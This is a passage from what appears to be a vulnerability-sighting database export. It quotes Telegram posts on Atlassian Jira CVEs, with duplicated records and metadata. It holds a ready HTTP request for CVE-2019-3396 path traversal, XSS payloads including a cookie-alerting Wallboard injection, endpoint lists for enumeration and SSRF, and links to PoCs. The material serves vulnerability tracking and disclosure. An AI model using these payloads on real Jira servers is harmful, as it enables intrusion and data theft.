the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} https://db.gcve.eu/sighting/ff3e55e0-2287-4576-ad9f-83d2427ec089/export Mon, 18 Mar 2024 07:23:33 +0000 0f570dfd-31fd-4952-964a-3119073808f9 https://db.gcve.eu/sighting/0f570dfd-31fd-4952-964a-3119073808f9/export {"uuid": "0f570dfd-31fd-4952-964a-3119073808f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} {"uuid": "0f570dfd-31fd-4952-964a-3119073808f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2581", "content": "#exploit\n#Infographics\nUnauthenticated JIRA CVEs to Exploit:\nCVE-2020-14179 - Information Disclosure\nhttps://github.com/c0brabaghdad1/CVE-2020-14179\nCVE-2020-14181 - User Enumeration\nhttps://github.com/Rival420/CVE-2020-14181\nCVE-2020-14178 - Project Key Enumeration\nCVE-2019-3402 - XSS \nCVE-2019-11581 - SSTI\nCVE-2019-8451 - SSRF\nCVE-2019-8449 - User Information Disclosure\nCVE-2019-3403 - User Enumeration\nCVE-2019-8442 - Sensitive Info Disclosure\nhttps://mobile.twitter.com/harshbothra_/status/1346109605756116995", "creation_timestamp": "2024-10-09T19:49:41.000000Z"} https://db.gcve.eu/sighting/0f570dfd-31fd-4952-964a-3119073808f9/export Wed, 09 Oct 2024 19:49:41 +0000 9f90a703-598d-47b3-92bb-d8d7ce5cfe90 https://db.gcve.eu/sighting/9f90a703-598d-47b3-92bb-d8d7ce5cfe90/export {"uuid": "9f90a703-598d-47b3-92bb-d8d7ce5cfe90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/club31337/1624", "content": "CVE-2020-14179 - POC\n\nJira Server leads to information disclosure\n\n1. Visit https:///secure/QueryComponent!Default.jspa\n2. Information Disclosure about the custom Jira field names and custom SLA names.\n\n#jira #PoC #vuln", "creation_timestamp": "2024-11-11T01:43:49.000000Z"} {"uuid": "9f90a703-598d-47b3-92bb-d8d7ce5cfe90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/club31337/1624", "content": "CVE-2020-14179 - POC\n\nJira Server leads to information disclosure\n\n1. Visit https:///secure/QueryComponent!Default.jspa\n2. Information Disclosure about the custom Jira field names and custom SLA names.\n\n#jira #PoC #vuln", "creation_timestamp": "2024-11-11T01:43:49.000000Z"} https://db.gcve.eu/sighting/9f90a703-598d-47b3-92bb-d8d7ce5cfe90/export Mon, 11 Nov 2024 01:43:49 +0000